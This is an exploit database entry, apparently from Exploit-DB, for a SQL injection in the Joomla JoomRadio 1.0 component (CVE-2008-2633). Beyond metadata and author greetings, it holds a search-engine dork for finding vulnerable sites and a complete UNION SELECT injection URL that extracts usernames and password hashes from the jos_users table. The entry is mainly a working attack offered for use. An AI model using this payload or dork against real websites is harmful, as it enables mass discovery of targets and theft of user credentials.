Joomla! Component JoomRadio 1.0 - SQL Injection
Author: Mr.tro0oqy
type: webapps
platform: php
port:
date_added: 2010-04-25
date_updated: 2016-12-05
verified: 1
codes: CVE-2008-2633;OSVDB-45934
tags:
aliases:
screenshot_url:
application_url:
Joomla Component com_joomradio SQL injection vulnerability
author:Mr.tro0oqy from "community * college"
email:t.4@windowslive.com
greetz:alzomer,Mr.ksoory,my bb ;)
dork: inurl:index.php?option=com_joomradio
exp:
[site]/path/index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--